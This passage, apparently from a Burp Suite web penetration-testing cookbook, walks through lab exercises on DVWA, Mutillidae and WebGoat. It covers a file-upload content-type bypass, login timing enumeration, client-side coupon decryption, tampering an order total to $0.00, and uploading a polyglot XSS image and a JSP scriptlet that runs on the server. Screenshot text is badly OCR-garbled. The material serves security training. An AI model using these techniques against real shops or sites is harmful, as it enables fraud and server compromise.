2. At the login page, use these credentials: Username: user; Password: user. 

3. Select the DVWA Security option from the menu on the left. Change the 
default setting of low to medium and then click Submit: 


DÚA) 


Home 
Instructions 
Setup 


Brute Force E 


Command Execution 
CSRF 

Insecure CAPTCHA 
File Inclusion 

SQL Injection 

SQL Injection (Blind) 
Upload 

XSS reflected 

XSS stored 


DVWA Security 


DVWA Security » 


Script Security 


Security Level is currently medium. 
You can set the security level to low, medium or high. 


The security level changes the vulnerability level of DVWA. 


low (~|. Submit 
low 


| 
medium 


high l 
PHPIDS v.0.6 (PHP-Intrusion Detection System) is a security layer for PHP based web applications. 
You can enable PHPIDS across this site for the duration of your session. 


PHPIDS is currently disabled. [enable PHPIDS] 
Simulate attack] - [View IDS log 


4. Select the Upload page from the menu on the left: 


TAA Vulnerability: File Upload 
ee Choose an image to upload: 
Setup Browse... No file selected. 
Upload 

Brute Force pog 
Command Execution : 
a More info 
CSRF 

http://www.owasp.org/index.php/Unrestricted_File Upload 
See = http://blogs.securiteam.comlindex. php/archives/1268 
File Inclusion http://www.acunetix.com/websitesecurity/upload-forms-threat.htm 
SQL Injection 
SQL Injection (Blind) 


Upload 


5. Note the page instructs users to only upload images. If we try another type 
of file other than a JPG image, we receive an error message in the upper 
left-hand corner: 


Your image was not uploaded. 


6. On your local machine, create a file of any type, other than JPG. For 
example, create a Microsoft Excel file called 
malicious_spreadsheet.x1sx. It does not need to have any content for the 
purpose of this recipe. 

7. Switch to Burp's Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

8. Return to Firefox, and use the Browse button to find the 
malicious_spreadsheet.x1sx file on your system and click the Upload 
button: 


Vulnerability: File Upload 


Choose an image to upload: 
Browse... malicious_spreadsheet.xlsx 


Upload 


9. With the request paused in Burp's Proxy | Interceptor, change the Content- 
type from application/vnd.openxmlformats- 
of ficedocument. spreadsheet. sheet to image/jpeg instead. 
o Here is the original: 


AAAA aAA 160903101016069 
Content-Disposition: form-data; name="MAX FILE SIZE" 


100000 

e Sa ARSE TERNAEEED 180303101018063 

Content-Disposition: form-data; name="uploaded"; filenane="nalicious spreadsheet. xlsx" 
Content-Type: application/vnd. openxal formats-offi eee 


o Here is the modified version: 


ele a a NS 100303101010069 
Content-Disposition: form-data; name="MAX PILE SIZE" 


100000 

aea A aa Gaalaa 180903101010069 

Content-Disposition: form-data; name='uploaded"; filename="malicious spreadsheet. xlsx" 
Content-Type: image/jpeg 


10. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 

11. Note the file uploaded successfully! We were able to bypass the weak data 
validation checks and upload a file other than an image: 


Vulnerability: File Upload 


Choose an image to upload 
Browse... No file selected. 


Upload 


../../hackable/uploads/malicious spreadsheet.xlsx succesfully uploaded! 


How it works... 


Due to weak server-side checks, we are able to easily circumvent the image- 
only restriction and upload a file type of our choice. The application code only 
checks for content types matching image/jpeg, which is easily modified with an 
intercepting proxy such as Burp. Developers need to simultaneously whitelist 
both content-type as well as file extensions in the application code to prevent 
this type of exploit from occurring. 


Performing process-timing attacks 


By monitoring the time an application takes to complete a task, it is possible for 
attackers to gather or infer information about how an application is coded. For 
example, a login process using valid credentials receives a response quicker than 
the same login process given invalid credentials. This delay in response time 
leaks information related to system processes. An attacker could use a response 
time to perform account enumeration and determine valid usernames based upon 
the time of the response. 


Getting ready 


For this recipe, you will need the common_pass.txt wordlist from wfuzz: 


e https://github.com/xmendez/wfuzz 


o Path: wordlists | other | common_pass.txt 


Using OWASP Mutillidae II, we will determine whether the application provides 
information leakage based on the response time from forced logins. 


How to do it... 


Ensure Burp is running, and also ensure that the owaspbwa VM is running and 
that Burp is configured in the Firefox browser used to view owaspbwa 
applications. 


1. From the owaspbwa landing page, click the link to OWASP Mutillidae II 
application. 

2. Open Firefox browser to the home of OWASP Mutillidae II (URL: 
http://<your_VM_assigned_IP_address>/mutillidae/). 

3. Go to the login page and log in using the username ed and the password 
pentest. 

4. Switch to Burp's Proxy | HTTP history tab, find the login you just 
performed, right-click, and select Send to Intruder: 


Burp Intruder Repeater Window Help 


od ed WebSocets history 
Fiter: Hiding CSS, image and general binary content 


Rav Hex 


POST /mutillidae/index.php?page=login.php HITP/1.1 

Host: 192.168. 6.101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20LO0101 Firefox/6l.0 
Accept: text/html, application/xhtultxml, application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 101/mutillidae/index. php?page=login. php 
Content-Type: application/x-wwnv-form-urlencoded Send to Spider 
Content-Length: $8 Do an active scan 
Cookie: showhints=1; acopendivids=swingset, jotto,phpbb2,redmine; acgra 
Connection: close 
Upgrade-Insecure-Requests: 1 Send to Intruder 


Send to Repeater Ctrl 


Do a passive scan 


username=edépassword=pentestélogin-php-submit-button=Login 


5. Go to the Intruder | Positions tab, and clear all the payload markers, using 
the Clear § button on the right-hand side: 


Payload Positions 


Configure the postions where payloads wil be inserted into the base request. The attack ype determines the way in which payloads are assigned to payload postions - see help for ful detls, 


Atak ype: | Sie 


POST /mutillidae/index.php?page=§login, php} HITP/L. 

Host: 192. 160. $6. 101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Winéd; x64; rv:61.0) Gecko/20L00101 Pirefox/6l.0 
Accept: text/html, application/xhtmltyml, application/xml;q20.9,*/*;q0.8 

Accept-Language: en-US, enjq=0.$ 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 10. /mutdllidae/index. php?page=Login. php 

Content-Type; application/x-www- form-urlencoded 

Content-Length: $8 

Cookie: showhints=§1§; acopendivids=Sswingset, Jotto phpbb? redwineS; acqroupswithpersist=§nada}; Server=(h3dheSBid2ges; 
PHPSESSID = Shwe }68}mLe33n$045ahes4$607§ 

Connection: close 

Upgrade-Insecure-Requests: 1 


usernane=fedf (password=§pentest§ clogin-php-submit-button=fLoging 


6. Select the password field and click the Add § button to wrap a payload 
marker around that field: 


oo) 


Payload Positions 


2: | Start attack 
Configure the postions where payloads wil be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full details. 

Attack type: | Sniper hd} 
idae/index. php?page=login. php HTTP/1.1 Tal 

6 | 

(Windows NT 10.0; Winé4; x64; rv:€1.0) Gecko/20100101 Firefox/é1.0 
‘ n/xhtml+xml, application/xm1;q=0.$,*/*;q=0.8 | Clearg | 
s 

Auto § J 
//192. 168. SE. 101/mutillidae/index.php?page=login. php -a 
e: application/x-www-form-urlencoded Refresh | 
gth: $8 | Refresh | 


n 
howhints=l; acopendivids=svingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; Server=b3dhc3Bid2E=; PHPSESSID=kvéjé8jmle33n5045ahe549607 
n: close 


Upgrade-Insecure-Requests: 1 


7. Also, remove the PHPSESSID token. Delete the value present in this token 
(the content following the equals sign) and leave it blank. This step is very 
important, because if you happen to leave this token in the requests, you 
will be unable to see the difference in the timings, since the application will 
think you are already logged in: 


Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full details. 


Attack type: | Sniper 


POST /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/él.0 
Accept: text/html,application/xhtmltxml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=login-php 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 58 

Cookie: showhints=1; acopendivids=swingset,jotto,phpbhl,redmine; acgroupswithpersist=nada; Server=b3dhc3BidlE=; | 
Connection: close 

Upgrade-Insecure-Requests: 1 


username=edépassword=§pentest§ élogin-php-submit-button=Login 


8. Go to the Intruder | Payloads tab. Within the Payload Options [Simple list], 
we will add some invalid values by using a wordlist from wfuzz 
containing common passwords: wfuzz | wordlists | other | 
common_pass.txt: 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


Paste 


123456 
1234567 
12345678 
123asdf 


Admin 

admin 
administrator 
asdf123 


gag 


Add Enter a new item 


9. Scroll to the bottom and uncheck the checkbox for Payload Encoding: 


| Payload Encoding 


This setting can be used to URL-encode selected characters within the final payload, for safe transmission within HTTP requests. 


LJ URL-encode these characters: Me«=?+ge."f" 


10. Click the Start attack button. An attack results table appears. Let the attacks 
complete. From the attack results table, select Columns and check Response 
received. Check Response completed to add these columns to the attack 
results table: 


Tot] Py | spite | omer || er | Sem | ete | cp] tne | pct | wep | et 
+x [ua P intruder attack 1 -0 X 


(Tup puton Tg C Attack Save KENTIN 
Pmt V Request 


You can define one or more paylo , 
customized in diferent ways. |p 2 Status Emor | Timeout | Length | Comment 
i enti 2 0 O0 snes 
Payoadset: (1 | 200 0 0 sm 
. ? 200 0 0 5097 
Poa: ADN, V Timeout m 0 QO su 
| Veg w O 0 om 
Cookies 
Payload Options [Simple T 
This payload type lets you config 
(re) fm 
ttit 
. 


WWWW = 


Add | | Enter a new item 


Add from ist... 


p Payload Processing 


You can define rules to perform 


—k 


11. Analyze the results provided. Though not obvious on every response, note 
the delay when an invalid password is used such as administrator. The 
Response received timing is 156, but the Response completed timing is 
166. However, the valid password of pentest (only 302) receives an 
immediate response: 50 (received), and 50 (completed): 


Bintruder attack 12 = U ) 


Attack Save Colums 
a at ot [| 


Request Payoad Status | Response received | Response completed |Eror | Tieout |Lengh 


| 50820 
2 (23486 m 8 48 50820 
3 (24867 m g 83 50820 
4 (248678 m 19 139 50820 
5 123asdi Mo 130 13 50820 
1 admin m 19 1% 


50820 


a @ @ [Be et ei ei sj = 


> a @ ESE Si Seis] D 


How it works... 


Information leakage can occur when processing error messages or invalid coding 
paths takes longer than valid code paths. Developers must ensure the business 
logic does not give away such clues to attackers. 


Testing for the circumvention of work 
flows 


Shopping cart to payment gateway interactions must be tested by web app 
penetration testers to ensure the workflow cannot be performed out of sequence. 
A payment should never be made unless a verification of the cart contents is 
checked on the server-side first. In the event this check is missing, an attacker 
can change the price, quantity, or both, prior to the actual purchase. 


Getting ready 


Using the OWASP WebGoat application and Burp, we will exploit a business 
logic design flaw in which there is no server-side validation prior to a purchase. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select the OWASP WebGoat 
application from the initial landing page of the VM. The landing page will 
be configured to an IP address specific to your machine. 

2. After you click the OWASP WebGoat link, you will be prompted for login 
credentials. Use these credentials: User Name: guest; password: guest. 

3. After authentication, click the Start WebGoat button to access the 
application exercises. 

4. Click AJAX Security | Insecure Client Storage from the left-hand menu. 
You are presented with a shopping cart: 


Choose another language: English v Logout 0 
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STAGE 1: For this exercise, your mission is to discover a coupon code to receive an unintended 
discount. 


Shopping Cart 


Studio RTA - Laptop/Reading Cart with 
Tilting Surface - Cherry $69.99 oo po 


Dynex - Traditional Notebook Case | $27,99 o o 0.00 
Hewlett-Packard - Pavilion Notebook 

with Intel® Centrino™ $1599.99 o $0.00 
3 - Year Performance Service Plan 

$1000 and Over $299.99 a $0.00 


Total before coupon is applied: $0.00 


Total to be charged to your credit card: $0.00 


4128 3214 0002 1999 


Enter your credit card number: 


Enter your coupon code: 


“Purchase 


ASPECTISECURITY 
Application Security Experts 


OWASP Foundation | Project WebGoat | Report Bug 


5. Switch to Burp's Proxy | HTTP history tab, Click the Filter button, and 
ensure your Filter by MIME type section includes Script. If Script is not 
checked, be sure to check it now: 


[Target | Proxy | spider | scanner | intruder | Repeater | Sequencer | Decoder | comparer | Extender | Project options | user options | Alerts | 


| Fiter: Hiding CSS, image and general binary content 


| (2) Filter by request type _ Fiter by MIME type _ Fitter by status code 


O O Show only in-scope items Œ) HTML @ Other text @ 2xx [success] 
U) Hide items without responses | @ Script | O Images @ 3xx [redirection] 
O Show only parameterized requests @ XML @ Flash @ 4xx [request error] 
Ø css ©) Other binary @ Sxx [server error] 
Filter by search term Filter by file extension Filter by annotation Filter by listener 


CJ Show only: | asp,aspx,jsp,php O Show only commented items — 
Port 
O Regex p 2 ane : 
x AN h highligh’ 
O Case sensitive () Negative search o miae is,gif.ipa.png,css aac 


| Show all | | Hidean | | Revert changes | 


6. Return to the Firefox browser with WebGoat and specify a quantity of 2 for 
the Hewlett-Packard - Pavilion Notebook with Intel Centrino item: 


STAGE 1: For this exercise, your mission is to discover a coupon code to receive an unintended 
discount. 


http! 


Shopping Cart 


Studio RTA - Laptop/Reading Cart with 
Tilting Surface - Cherry $69.99 o | $0.00 


gars o [oo 
Hewlett-Packard - Pavilion Notebook 

with Intel® Centrino ™ $1599.99 $3,199.98 
3 - Year Performance Service Plan 


Total before coupon is applied: $3,199.98 
Total to be charged to your credit card: $3,199.98 
Enter your credit card number: 4128 3214 0002 1999 


Enter your coupon code: | 


Purchase 


. Switch back to Burp's Proxy | HTTP history tab and notice the JavaScript 


(*.js) files associated with the change you made to the quantity. Note a 
script called clientSideValiation. js. Make sure the status code is 200 
and not 304 (not modified). Only the 200 status code will show you the 
source code of the script: 


http:/!192.168.56.101 GET MebGoatlattack?Screen=119&menu=400 V 20 35 KML insecure Client Storage 
http://192.168,56.101 GET  MebGoatjavascriptjavaseript js W 229s erint i 
http.//192.168,56, 101 GET  MebGoatiavascriptmenu_system js W4 230 script is 
http:/!192.168,.56.101 GET  MebGoatjavascripttoggle.js 304 230 script is 
http://192.168.56.101 GET MebGoatavascriptimakeWindow js W4 29 serit i 
l WebCnatiavaccrint/iegennNay je ; ' is 


92.168.56.101 


. Select the clientSideValidation.js file and view its source code in the 


Response tab. 


. Note that coupon codes are hard-coded within the JavaScript file. However, 


used literally as they are, they will not work: 


[nent | TPA [esc ay | onns] 
Fitter: Hiding CSS, image and general binary content 


| Method | URL (Params | Edited | Status | Length | MIME type | Extension | 


Cs 


HTTP/1.1 200 OK 

Date: Sun, 09 Sep 2018 17:28:02 GMT 
Server: Apache-Coyote/1.1 

Pragma: No-cache 

Cache-Control: no-cache 

Expires: Wed, 31 Dee 1969 19:00:00 EST 
Accept-Ranges: bytes 

ETag: W/"2946-1438572894000" 
Last-Modified: Mon, 03 Aug 2015 03:34:54 GMT 
Content-Type: text/javascript 

Via: 1.1 127.0.1.1 

Vary: Accept-Encoding 

Content-Length: 2946 

Connection: close 


var coupons = ["nvojubmq", 
"emph", 
"sfmmjt", 


"pxuttfsq"]; 


function isValidCoupon (coupon) { 
coupon = coupon.toUpperCase(); 
for(var i=0; i<coupons.length; itt) { 
decrypted = decrypt (coupons[i]) ; 
if(coupon == decrypted) { 
ajaxFunction (coupon) ; 
return true; 
} 
} 


return false; 


10. Keep looking at the source code and notice there is a decrypt function 
found in the JavaScript file. We can test one of the coupon codes by sending 
it through this function. Let’s try this test back in the Firefox browser: 


11. 


12. 


In the browser, bring up the developer tools (F12) and go to the Console 
tab. Paste into the console (look for the >> prompt) the following command: 


decrypt('emph'); 


You may use this command to call the decrypt function on any of the 
coupon codes declared within the array: 
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Solution Videos 


* Keep looking for the coupon code. 


Shopping Cart Items -- To Buy 
Now 


Silent Transactions Attack - 
Lent “Tansactions åttacks Studio RTA - Laptop/Reading Cart with 
Dangerous Use of Eval Tilting Surface - Cherry 
i ys 
Insecure Client Storage Dynex - Traditional Notebook Case 


Authentication Flaws = 
Buffer Overflows Hewlett-Packard - Pavilion Notebook 


Code Quality with Intel® Centrino™ 


Concurrency 3 - Year Perf Service Pl 
Cross-Site Scripting (XSS) $1000 and — átl 
Improper Error Handling 


Injection Flaws 


Denial of Service Total before coupon is applied: 
Insecure Communication 


Ca Ci Inspector 6] Console (© Debugger {} Style Editor © Performance 
w y Filter output 


decrypt('emph'); 


13. After pressing Enter, you will see the coupon code is decrypted to the word 
GOLD: 


Ca (7 Inspector Console 


WwW y Filter output 
| >> decrypt('emph'); 
€ "GOLD" 


14. Place the word GOLD within the Enter your coupon code box. Notice the 
amount is now much less. Next, click the Purchase button: 


STAGE 1: For this exercise, your mission is to discover a coupon code to receive an unintended 
discount. 


* Keep looking for the coupon code. 


Shopping Cart 


Shopping Cart Items -- To Buy g 
ine Quantity Total 
Studio RTA - Laptop/Reading Cart with 
Tilting Surface - Cherry $69.99 oo $0.00 
Dynex - Traditional Notebook Case $27.99 oF $0.00 


Hewlett-Packard - Pavilion Notebook | 

with Intel® Centrino™ $1599.99 $3,199.98 
3 - Year Performance Service Plan 

$1000 and Over $299.99 o i] $0.00 


Total before coupon is applied: $3,199.98 
Total to be charged to your credit card: $1,599.99 
Enter your credit card number: 4128 3214 0002 1999 © 


Enter your coupon code: GOLD 


15. We receive confirmation regarding stage 1 completion. Let's now try to get 
the purchase for free: 


STAGE 2: Now, try to get your entire order for free. 


* Stage 1 completed. 


16. Switch to Burp's Proxy | Intercept tab and turn Interceptor on with the 


button Intercept is on. 
17. Return to Firefox and press the Purchase button. While the request is 


paused, modify the $1,599.99 amount to $0.00. Look for the GRANDTOT 
parameter to help you find the grand total to change: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
_funsercest HTTP history | WebSockets history | Options 


|.) Request to httpv/192.168.56.101:80 
Forward j Drop | | hterceptison | Action j l 3 


Raw | Params | Headers | Hex 


POST /WebGoat/attack?Screen=11Sémenu=400 HTTP/1.1 
o 2.168. 56.101 
nt: Mozilla/5.0 (Windows NT 10.0; Winé4; x&4; rv:61.0) Gecko/20100101 Firefox/61.0 
n/xhtmlłxml,application/xml;q=0.9,*/*;q=0.8 


te 
E8. 56. 101/WebGoat /attack?Screen=1l194menu=400 
plication/x-www-form-urlencoded 


3 
NID=CD7B30EBASSC7SSEEOSCOAGE4736A284; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 


de 23V1¢c3QEZ3V1c3 


Connecti 
Upgrade-Insecure-Requests: 1 
SSEQTY4=0TOT4=$ 240. OOGSUBTOT=$243%2C1S9. S8<GRANDTOT= 


PROL=$2469. SSCQTY1=04TOT1=¥240. 00£PRC2=42427. SSEQTY2=04TOT2=4240. OOGPRC3=¥241589. SSKQTY3=2ETOTI=$743820189. 986PRC4=424299 
¥24000qc tie1d2=4128+3214+0002+19996 £ieldl=GOLD<SUBMIT=Purchase 


18. Click the Forward button. Now turn Interceptor off by clicking the toggle 


button to Intercept is off. 
19. You should receive a success message. Note the total charged is now $0.00: 


Choose another language: | English v Logout KJ 
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STAGE 2: Now, try to get your entire order for free, 


* Congratulations, You have successfully completed this lesson. 


Studio RTA - Laptop/Reading Cart wth Vy 
Tilting Surface - Cherry 


Enter your credit card number: 4128 3214 0002 1999 
Enter your coupon code: GOLD 


How it works... 


Due to a lack of server-side checking for both the coupon code as well as the 
grand total amount prior to charging the credit card, we are able to circumvent 
the prices assigned and set our own prices instead. 


Uploading malicious files — polyglots 


Polyglot is a term defined as something that uses several languages. If we carry 
this concept into hacking, it means the creation of a cross-site scripting (XSS) 
attack vector by using different languages as execution points. For example, 
attackers can construct valid images and embed JavaScript with them. The 
placement of the JavaScript payload is usually in the comments section of an 
image. Once the image is loaded in a browser, the XSS content may execute, 
depending upon the strictness of the content-type declared by the web server and 
the interpretation of the content-type by the browser. 


Getting ready 


e Download a JPG file containing a cross-site scripting vulnerability from the 


PortSwigger blog page: https://portswigger.net/blog/bypassing-csp-using- 
polyglot-jpegs 
o Here is a direct link to the polyglot image: http://portswigger- 
labs.net/polyglot/jpeg/xss.jpg 
e Using the OWASP WebGoat file upload functionality, we will plant an 
image into the application that contains an XSS payload. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select the OWASP WebGoat 
application from the initial landing page of the VM. The landing page will 
be configured to an IP address specific to your machine. 

2. After you click the OWASP WebGoat link, you will be prompted for login 
credentials. Use these credentials: username: guest; password: guest. 

3. After authentication, click the Start WebGoat button to access the 
application exercises. 


4. Click Malicious Execution | Malicious File Execution from the left-hand 
menu. You are presented with a file upload functionality page. The 
instructions state that only images are allowed for upload: 


Internationalization is not available for this lesson Logout 0) 
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Malicious File Execution 
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The form below allows you to upload an image which will be displayed on this page, Features like 
this are often found on web based discussion boards and social networking sites, This feature is 
vulnerable to Malicious File Execution, 


In order to pass this lesson, upload and run a malicious file, In order to prove that your file can 
execute, it should create another file named: 


/\ar/lib/tomcat6/webapps/WebGoat/mfe_target/quest, txt 


Once you have created this file, you will pass the lesson, 


WebGoat Image Storage 
Your current image: 
No image uploaded 


Upload a new image: Browse. Nol selected, Start Upload | 


iii wf AN DIANT 


INTELLIGENT INFORMATION GCOURITY 


OWASP Foundation | Project WebGoat | Report Bug 


5. Browse to the location where you saved the xss.jpg image that you 
downloaded from the PortSwigger blog page mentioned at the beginning of 
this recipe. 

6. The following screenshot how the image looks. As you can see, it is 
difficult to detect any XSS vulnerability contained within the image. It is 
hidden from plain view. 


7. Click the Browse button to select the xss.jpg file: 


Malicious File Execution 
OWASP WebGoat v5.4 <<... O f Sho 00 esson Plar sho Solutio 
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The form below allows you to upload an image which will be displayed on this page. Features like 
this are often found on web based discussion boards and social networking sites. This feature is 
vulnerable to Malicious File Execution. 


Code Quality 

teat lee aT (XSS) In order to pass this lesson, upload and run a malicious file. In order to prove that your file can 
Improper Error Handling execute, it should create another file named: 

Injection Flaws z 

Bead al of Service /var/lib/tomcat6/webapps/WebGoat/mfe_target/guest.txt 

Insecure Communication g ; 

Insecure Configuration Once you have created this file, you will pass the lesson. 


Insecure Storage 


Malicious Execution WebGoat Image Storage 


Malicious File Execution 


Parameter Tampering Your current image: 


Session Management Flaws 
Web Services 

Admin Functions A 

Challenge Upload a new image: Browse...  xss.jpg Start Upload 


No image uploaded 


aid cue M ANDIANT 
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OWASP Foundation | Project WebGoat | Report Bug 


8. Switch to Burp's Proxy | Options. Make sure you are capturing Client 
responses and have the following settings enabled. This will allow us to 
capture HTTP responses modified or intercepted: 


v 


(?) Intercept Server Responses 


o Use these settings to control which responses are stalled for viewing and editing in the Intercept tab. 


@) Intercept responses based on the following rules: Master interception is turned off 


Enabled | Operator | Match type | Relationship | Condition 


Content type header Matches text 
Request Was modified 


Status code Does not match *304$ d 
URL ls in target scope 


Remove 


ile 


f 


Down 


Œ Automatically update Content-Length header when the response is edited 


9. Switch to Burp's Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 
10. Return to the Firefox browser, and click the Start Upload button. The 
message should be paused within Burp's Interceptor. 


Target | vel Spider | Scanner | Intruder | Repeater | Sequencer | Decoder Comparer | Extender | Project options | User options Alerts | 
intercept | HTTP history | WebSockets history | Options 


Ba Request to http://192.168.56.101:80 
Forward Drop Action 
OCO 


POST /WebGoat/attack?Screen=18émenu=1600 HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/6é1.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/WebGoat/attack?Screen=18émenu=1600 

Content-Type: multipart/form-data; houndary=--------------------------- 41184676334 
Content-Length: 25261 

Cookie: JSESSIONID=E12D7A11F1C365245CD0E12668407E2D; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Authorization: Basic Z3V1l¢e3Q6Z3V1¢e3Q= 

Connection: close 

Upgrade-Insecure-Requests: 1 


r= 41184676334 

Content-Disposition: form-data; name="myfile"; filename="xss.jpg" 

Content-Type: image/jpeg 

ySya/* JF I FOOODODXOHOOOO000000000000000000000202020202020d02d02u2du02d02gd02gd02gd0D20D000g0g02020202d02u02gu02gu02d00000000g0gu0g0guD0D0u0000000u0202u02u02d02gu02nzgz00000000gu0gd0g000000u0u000N0) 


oooo0000000000000000000000000000000000000000g0gd02d0d000000g0gu0zd0D02u0u00gz02bu020202000000ngngnnoooOoOoOooooOoOoOo0o0oOoooooOoooooooooooo0o0o0o0o000000000000) 
oooo00o000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) 


11. Within the Intercept window while the request is paused, type Burp rocks 
into the search box at the bottom. You should see a match in the middle of 
the image. This is our polyglot payload. It is an image, but it contains a 
hidden XSS script within the comments of the image: 


(4) Request to http://192.168.56.101:80 


(__Forwera (oop  ) (eren (Acton | 


| Raw [Params | Headers | Hex | 


oo0o0o0ooo0ooo00o000000000000000000000o000002000d02ud02ld21Dg2gu0u00u02nDngn0gnpnNn« 
oooooooooooooo0o0o0000000000020202g0g00g0g02n0znDnpnpnpoOo0000000d0200udu02g0gd0udgzghgwn nm 
ooooooooooooOoooooooOoooOooOoooOoOooOoOooOooOooOooOoOoOoOoOoOoOooOooOoOoOoooooooe 
oooooooooooo0oooo0oo0ooooooooooooooooooooooooooOoooo0o0o0o0o00000o0oc 
oooooooooooooo00o000o0000000000000020000u0gd02gd02D2gd2zludnDgz»9 000000 
ooo0oooooooo0oooo0oooooooRooOooOoooooooooooooooooooooooooooooooe 
oo0oooooooooo0o0o000000000000202g020D00020g020g0b0D0pDnRnnDvpo00000000d00udu00g0uNnrL 
noooooooooooOoooooooooooooOooooooOooOooOooOoooOooooOoooOoooOooooooooe 
oooooooooooo0o0oo0o0oo00oo0ooooooooooooooooooooooooooooooo0o00o0oooe 
oooooooooooooo0o0o000000000000020200002gd020d02gd02ldDuzgmnn00000000000000d00nr 
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12. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 

13. Using Notepad or your favorite text editor, create a new file called 
poly.jsp, and write the following code within the file: 


<HTML> 


<% java.io.File file = new 
java.io.File("/var/lib/tomcat6/webapps/WebGoat/mfe_target/guest.txt"); 


file.createNewEile();%> 
</HTML> 


14. Return to the Malicious File Execution page, and browse to the poly.jsp 
file you created, and then click the Start Upload button. The poly.jsp isa 
Java Server Pages file that is executable on this web server. Following the 
instructions, we must create a guest.txt file in the path provided. This 
code creates that file in JSP scriptlet tag code: 


Solution Videos Restart this Lesson 


The form below allows you to upload an image which will be displayed on this page. Features like 
this are often found on web based discussion boards and social networking sites. This feature is 
vulnerable to Malicious File Execution. 


In order to pass this lesson, upload and run a malicious file. In order to prove that your file can 
execute, it should create another file named: 


/var/lib/tomcat6/webapps/WebGoat/mfe_target/guest.txt 


Once you have created this file, you will pass the lesson. 


WebGoat Image Storage 
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OWASP Foundation | Project WebGoat | Report Bug 


15. Right-click the unrecognized image, and select Copy Image Location. 

16. Open a new tab within the same Firefox browser as WebGoat, and paste the 
image location in the new tab. Press Enter to execute the script, and give 
the script a few seconds to run in the background before moving to the next 
step. 


17. Flip back to the first tab, F5, to refresh the page, and you should receive the 
successfully completed message. If your script is running slowly, try 
uploading the poly. jsp on the upload page again. The success message 
should appear: 
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Solution Videos Restart this Lesson 


The form below allows you to upload an image which will be displayed on this page, Features like 
this are often found on web based discussion boards and social networking sites, This feature is 
vulnerable to Malicious File Execution, 


In order to pass this lesson, upload and run a malicious file, In order to prove that your file can 
execute, it should create another file named: 


/\var/ib/tomcat6/webapps/WebGoat/mfe_target/quest, txt 


Once you have created this file, you will pass the lesson, 
* Congratulations, You have successfully completed this lesson, 
WebGoat Image Storage 
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OWASP Foundation | Project WebGoat | Report Bug 


How it works... 


Due to unrestricted file upload vulnerability, we can upload a malicious file such 
as a polyglot without detection from the web server. Many sites allow images to 
be uploaded, so developers must ensure such images do not carry XSS payloads 
within them. Protection in this area can be in the form of magic number checks 
or special proxy servers screening all uploads. 


There's more... 


To read more about polyglots, please refer to the Portswigger 
blog: https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs. 


Evaluating Input Validation Checks 


In this chapter, we will cover the following recipes: 


Testing for reflected cross-site scripting 
Testing for stored cross-site scripting 
Testing for HTTP verb tampering 
Testing for HTTP Parameter Pollution 
Testing for SQL injection 

Testing for command injection 


Introduction 


Failure to validate any input received from the client before using it in the 
application code is one of the most common security vulnerabilities found in 
web applications. This flaw is the source for major security issues, such as SQL 
injection and cross-site scripting (XSS). Web-penetration testers must evaluate 
and determine whether any input is reflected back or executed upon by the 
application. We'll learn how to use Burp to perform such tests. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


e OWASP Broken Web Applications (VM) 
e OWASP Mutillidae link 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Testing for reflected cross-site 
scripting 


Reflected cross-site scripting occurs when malicious JavaScript is injected into 
an input field, parameter, or header and, after returning from the web server, is 
executed within the browser. Reflected XSS occurs when the execution of the 
JavaScript reflects in the browser only and is not a permanent part of the web 
page. Penetration testers need to test all client values sent to the web server to 


determine whether XSS is possible. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application protects 
against reflected cross-site scripting (XSS). 


How to do it... 


1. From the OWASP Mutilliae II menu, select Login by navigating to OWASP 
2013 | A3 - Cross Site Scripting (XSS) | Reflected (First Order) | Pen Test 
Tool Lookup: 


@« OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - 5cript Kidd1e) Not Logged In 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL Reset DB View Log View Captured 


OWASP 2013 A1 - Injection (SQL) 
N Pen Test Tool Lookup 


OWASP 2010 


A2 - Broken Authentication and 
OWASP 2007 Session Management f Help Me! 


Web Services A3 - Cross Site Scripting (XSS) >| Reflected (First Order) > DNS Lookup 


A4 - Insecure Direct Object > Persistent (Second Order) > Pen Test Tool Lookup 


2. Select a tool from the drop-down listing and click the Lookup Tool button. 
Any value from the drop-down list will work for this recipe: 


Pen Test Tool Lookup 
2 Help Me! 


u 
D 
O 
x 


Hints 


E 
Switch to AJAX Version of page 
AJAX 


Pen Test Tools 


